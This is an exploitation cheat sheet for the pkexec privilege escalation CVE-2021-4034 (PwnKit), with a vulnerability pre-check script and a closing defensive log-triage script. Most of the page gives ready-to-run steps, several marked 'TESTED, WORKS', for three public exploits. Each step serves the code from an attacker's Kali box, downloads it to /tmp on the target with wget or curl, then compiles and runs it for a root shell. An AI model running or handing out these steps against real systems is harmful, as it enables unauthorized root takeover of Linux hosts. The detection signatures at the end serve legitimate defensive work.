Polkit’s pkexec utility exploit (CVE-2021-4034)

A local privilege escalation vulnerability (PwnKit) was found in polkit's pkexec utility. pkexec is a setuid-root tool that lets unprivileged users run commands as privileged users according to predefined policies. The bug: pkexec never handles being executed with an empty argument list (argc == 0), so its option parser reads argv[1], which in that layout is the same memory as envp[0]. pkexec resolves that string as a program name via PATH and writes the result back into the same slot, which re-injects an attacker-controlled environment variable (GCONV_PATH) that the dynamic loader would otherwise strip from a setuid process. From there an attacker-supplied shared object is loaded and runs as root. Exploitation is local only, needs nothing beyond a shell on the box, and worked on every stock polkit from 2009 until the January 2022 fix.

Check if vulnerable

Vulnerable: pkexec version <= 0.120 (from the list on NVD), not official… Upstream polkit 121 (the release after 0.120) carries the fix, but distributions backported it into their existing version numbers (Ubuntu still ships 0.105, for example), so the version string alone is not conclusive. Also confirm the binary is still setuid root: removing the setuid bit (chmod 0755 /usr/bin/pkexec) was the published mitigation and makes every exploit below fail. The dry-run in the berdav repo further down is the definitive check.

pkexec --version
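A pre-flight script that turns the points above into something you can paste into a target shell. This is an added example, not code from the page or from any of the exploit repositories; check_pkexec and the helper names are this example's own. It parses the "pkexec --version" output, compares it against 0.120 numerically per dotted component (a plain string compare would rank "121" below "0.120"), and checks that the binary is still setuid root. A return of 0 means "worth trying an exploit", not "confirmed vulnerable"; only a dry-run confirms that.

```shell
#!/bin/sh
# Added example: pre-flight checks for CVE-2021-4034. Helper names are this
# example's own; none of this comes from the exploit repositories.

# Extract "0.105" from "pkexec version 0.105"; prints nothing if the format differs.
parse_pkexec_version() {
    printf '%s\n' "$1" | sed -n 's/^pkexec version \([0-9][0-9.]*\).*/\1/p'
}

# version_le A B: succeed when dotted version A <= B, comparing each component
# numerically (so "121" > "0.120", which a string compare gets wrong).
version_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 0
    }'
}

# mode_is_setuid_root "<octal mode> <owner>": succeed when the file is owned by
# root and carries the setuid bit. stat -c '%a' prints a four-digit mode whose
# leading digit has the 4 bit set (4, 5, 6 or 7) for setuid files, and only
# three digits when no special bits are set.
mode_is_setuid_root() {
    mode=${1%% *}
    owner=${1#* }
    [ "$owner" = "root" ] || return 1
    case "$mode" in
        [4567]???) return 0 ;;
        *)         return 1 ;;
    esac
}

# check_pkexec [path]: 0 = setuid root and version <= 0.120 (run the dry-run next),
# 1 = mitigated or fixed upstream, 2 = pkexec not present.
check_pkexec() {
    bin=${1:-$(command -v pkexec)}
    [ -n "$bin" ] || { echo "pkexec not found"; return 2; }
    if ! mode_is_setuid_root "$(stat -c '%a %U' "$bin")"; then
        echo "$bin is not setuid root (mitigated)"; return 1
    fi
    ver=$(parse_pkexec_version "$("$bin" --version 2>/dev/null)")
    if [ -z "$ver" ]; then
        echo "could not parse version output; run the dry-run anyway"; return 0
    fi
    if version_le "$ver" 0.120; then
        echo "pkexec $ver is setuid root: possibly vulnerable (distro may have backported the fix)"
        return 0
    fi
    echo "pkexec $ver: fixed upstream"; return 1
}
```

Usage on the target is simply `. ./check.sh; check_pkexec` (or pass an explicit path). The version check is deliberately the weakest of the three signals; the setuid bit is what actually decides whether any of the exploits below can work.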

ExploitDB 50689

https://www.exploit-db.com/exploits/50689

Requires gcc on the target unless you use the compiled version from Kali (next subsection). Anything compiled on Kali only runs if the target has the same architecture and a glibc at least as new as Kali's; otherwise the exploit or the injected evil.so fails with a "version 'GLIBC_x.y' not found" error and you must compile on the target, or on a box with an older glibc.

TESTED, WORKS

On Kali: create evil-so.c, exploit.c and Makefile from the ExploitDB entry, then serve the directory

nano evil-so.c
nano exploit.c
nano Makefile
make # only if you will serve the compiled version (see below)
python3 -m http.server 80

On target: the gcc commands use relative paths and the exploit expects evil.so next to it, so download, compile and run from the same directory

cd /tmp
wget -O /tmp/evil-so.c http://x.x.x.x/evil-so.c
wget -O /tmp/exploit.c http://x.x.x.x/exploit.c
wget -O /tmp/Makefile http://x.x.x.x/Makefile
/usr/bin/gcc -shared -o evil.so -fPIC evil-so.c
/usr/bin/gcc exploit.c -o exploit
chmod u+x exploit
./exploit

Compiled version

Run make on Kali first and serve the directory that contains the 50689/ folder. On target, keep evil.so and exploit together and run from that directory:

cd /tmp
wget -O /tmp/evil.so http://x.x.x.x/50689/evil.so
wget -O /tmp/exploit http://x.x.x.x/50689/exploit
chmod u+x exploit
./exploit

berdav/CVE-2021-4034 (suggested by linpeas)

https://github.com/berdav/CVE-2021-4034

Option 1 – Compile on the target

Requires gcc and unzip on the target. If either is missing, check option 2.

On Kali

wget https://codeload.github.com/berdav/CVE-2021-4034/zip/main
python3 -m http.server 80

On target

cd /tmp
wget -O /tmp/main http://x.x.x.x/main
unzip main
cd CVE-2021-4034-main

Test if vulnerable

The dry-run uses the same trigger as the exploit but no root-shell payload, and reports whether pkexec is exploitable. Trust it over the version number, which distributions keep unchanged when they backport the fix.

make dry-run
dry-run/dry-run-cve-2021-4034

Compile and run the exploit

make
./cve-2021-4034

Option 2 – Compile code on Kali

TESTED, WORKS

On Kali

wget https://codeload.github.com/berdav/CVE-2021-4034/zip/main
unzip main
cd CVE-2021-4034-main
make
cd ..
tar -zcvf CVE-2021-4034.tar.gz CVE-2021-4034-main/
python3 -m http.server 80

On target

cd /tmp
curl -o /tmp/CVE-2021-4034.tar.gz http://x.x.x.x/CVE-2021-4034.tar.gz
tar xzvf CVE-2021-4034.tar.gz
cd CVE-2021-4034-main
./cve-2021-4034

The binary and the .so were built against Kali's glibc and architecture; if the target is older the run fails with a "version 'GLIBC_x.y' not found" error, in which case fall back to option 1 and compile on the target.

PwnKit

https://github.com/ly4k/PwnKit

Option 1 – Compile on the target

TESTED, WORKS

On Kali

wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.c
python3 -m http.server 80

On target

curl -o /tmp/PwnKit.c http://x.x.x.x/PwnKit.c
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
chmod u+x PwnKit
./PwnKit

Option 2 – Use pre-compiled version

TESTED, WORKS

On Kali

wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
python3 -m http.server 80

On target

curl -o /tmp/PwnKit http://x.x.x.x/PwnKit
chmod u+x PwnKit
./PwnKit
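The same page read from the defender's side, as an added example that is not from the page or from any of the exploit repositories. Qualys' advisory noted that this exploitation technique leaves pkexec's own error messages in the logs (the misspellings "found the" and "suscipious" are in pkexec's source, so they are matched literally), and that the bug can also be exploited without leaving traces, so no hits is not a clean bill. The public exploits also create a directory literally named GCONV_PATH=. in their working directory. Function names are this example's own and the log sample is constructed, not captured.

```shell
#!/bin/sh
# Added example: triage a host for CVE-2021-4034 exploitation attempts.
# Two signals: pkexec's error messages that most public exploits trigger,
# and the "GCONV_PATH=." directory the exploits leave in their working directory.

# Constructed sample of auth.log/syslog lines (not real captured output);
# lines 2 and 3 are the exploit signatures, the others are ordinary noise.
SAMPLE_LOG='Jan 26 10:31:01 host sshd[4100]: Accepted publickey for bob from 10.0.0.5 port 50222
Jan 26 10:31:02 host pkexec[4242]: bob: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=/usr/bin/true]
Jan 26 10:31:02 host pkexec[4242]: bob: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=/usr/bin/true]
Jan 26 10:31:05 host pkexec[4250]: bob: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/bob] [COMMAND=/usr/bin/apt update]'

# Both messages are spelled exactly as pkexec prints them; do not "fix" the typos.
PWNKIT_LOG_RE='pkexec\[[0-9]+\]: .*(The value for the SHELL variable was not found the /etc/shells file|The value for environment variable .* contains suscipious content)'

# Print the log lines (from stdin) that match the exploit signatures.
pwnkit_log_hits() {
    grep -E "$PWNKIT_LOG_RE"
}

# Count matching lines; grep -c prints 0 but exits 1 on no match, hence "|| true".
pwnkit_log_count() {
    grep -Ec "$PWNKIT_LOG_RE" || true
}

# List directories named GCONV_PATH=* below a path (default /), staying on one
# filesystem; these are the exploits' staging directories.
pwnkit_artifact_dirs() {
    find "${1:-/}" -xdev -type d -name 'GCONV_PATH=*' 2>/dev/null
}
```

On a live box: `pwnkit_log_hits < /var/log/auth.log` (or pipe in `journalctl -t pkexec`) and `pwnkit_artifact_dirs /tmp`; an attacker who ran one of the exploits above from /tmp and did not clean up leaves both signals.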